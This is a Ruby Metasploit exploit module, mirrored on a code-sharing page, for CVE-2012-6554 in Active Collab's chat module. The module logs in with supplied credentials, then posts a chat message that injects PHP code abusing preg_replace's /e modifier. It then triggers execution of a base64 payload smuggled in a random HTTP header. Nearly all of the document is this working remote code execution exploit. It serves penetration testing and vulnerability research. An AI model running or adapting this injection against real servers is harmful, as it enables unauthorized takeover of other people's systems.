Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/http/activecollab_chat.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Active Collab "chat module" Remote PHP Code Injection Exploit',

16
        'Description' => %q{

17
          This module exploits an arbitrary code injection vulnerability in the

18
          chat module that is part of Active Collab versions 2.3.8 and earlier by

19
          abusing a preg_replace() using the /e modifier and its replacement

20
          string using double quotes. The vulnerable function can be found in

21
          activecollab/application/modules/chat/functions/html_to_text.php.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'mr_me <steventhomasseeley[at]gmail.com>', # vuln discovery & msf module

26
        ],

27
        'References' => [

28
          ['CVE', '2012-6554'],

29
          ['OSVDB', '81966'],

30
          ['URL', 'http://www.activecollab.com/downloads/category/4/package/62/releases'],

31
        ],

32
        'Privileged' => false,

33
        'Payload' => {

34
          'Keys' => ['php'],

35
          'Space' => 4000,

36
          'DisableNops' => true,

37
        },

38
        'Platform' => ['php'],

39
        'Arch' => ARCH_PHP,

40
        'Targets' => [['Automatic', {}]],

41
        'DisclosureDate' => '2012-05-30',

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50


51
    register_options(

52
      [

53
        OptString.new('URI', [true, "The path to the ActiveCollab installation", "/"]),

54
        OptString.new('USER', [true, "The username (e-mail) to authenticate with"]),

55
        OptString.new('PASS', [true, "The password to authenticate with"])

56
      ]

57
    )

58
  end

59


60
  def check

61
    login_path = "public/index.php?path_info=login&re_route=homepage"

62
    uri = normalize_uri(datastore['URI'])

63
    uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? login_path : "/#{login_path}"

64


65
    cms = send_request_raw({ 'uri' => uri }, 25)

66


67
    uri = normalize_uri(datastore['URI'])

68
    uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/assets/modules/chat/' : '/public/assets/modules/chat/'

69


70
    chat = send_request_raw({ 'uri' => uri }, 25)

71


72
    # cant detect the version here

73
    if (cms and cms.body =~ /powered by activeCollab/)

74
      # detect the chat module

75
      if (chat and chat.code == 200)

76
        return Exploit::CheckCode::Detected

77
      end

78
    end

79
    return Exploit::CheckCode::Safe

80
  end

81


82
  def exploit

83
    user = datastore['USER']

84
    pass = datastore['PASS']

85
    p = Rex::Text.encode_base64(payload.encoded)

86
    header = rand_text_alpha_upper(3)

87
    login_uri = normalize_uri(datastore['URI'])

88
    login_uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/index.php?path_info=login' : '/public/index.php?path_info=login'

89


90
    # login

91
    res = send_request_cgi({

92
      'method' => 'POST',

93
      'uri' => login_uri,

94
      'vars_post' =>

95
        {

96
          'login[email]' => user,

97
          'login[password]' => pass,

98
          'submitted' => "submitted",

99
        }

100
    }, 40)

101


102
    # response handling

103
    if res and res.code == 302

104
      if res.get_cookies =~ /ac_ActiveCollab_sid_[a-zA-Z0-9]+=(.*); expires=/

105
        acsession = $1

106
      end

107
    elsif res and res.body =~ /Failed to log you in/

108
      print_error("#{rhost}:#{rport} Could not login to the target application as #{user}:#{pass}")

109
    elsif res and res.code != 200 or res.code != 302

110
      print_error("#{rhost}:#{rport} Server returned a failed status code: (#{res.code})")

111
    end

112


113
    # injection

114
    iuri = normalize_uri(datastore['URI'])

115
    iuri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'index.php' : '/index.php'

116
    iuri << "?path_info=chat/add_message&async=1"

117
    phpkode = "{\${eval(base64_decode(\$_SERVER[HTTP_#{header}]))}}"

118
    injection = "<th>\");#{phpkode}</th>"

119
    cookies = "ac_ActiveCollab_sid_eaM4h3LTIZ=#{acsession}"

120
    res = send_request_cgi({

121
      'method' => 'POST',

122
      'uri' => iuri,

123
      'headers' =>

124
        {

125
          'cookie' => cookies

126
        },

127
      'vars_post' =>

128
        {

129
          'submitted' => "submitted",

130
          'message[message_text]' => injection,

131
          'message[chat_id]' => "1",

132
          'message[posted_to_user_id]' => "all"

133
        }

134
    }, 25)

135


136
    euri = normalize_uri(datastore['URI'])

137
    euri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/index.php' : '/public/index.php'

138
    euri << "?path_info=/chat/history/1"

139


140
    # execution

141
    res = send_request_cgi({

142
      'method' => 'POST',

143
      'uri' => euri,

144
      'headers' =>

145
        {

146
          header => p,

147
          'cookie' => cookies

148
        }

149
    })

150
  end

151
end

152


153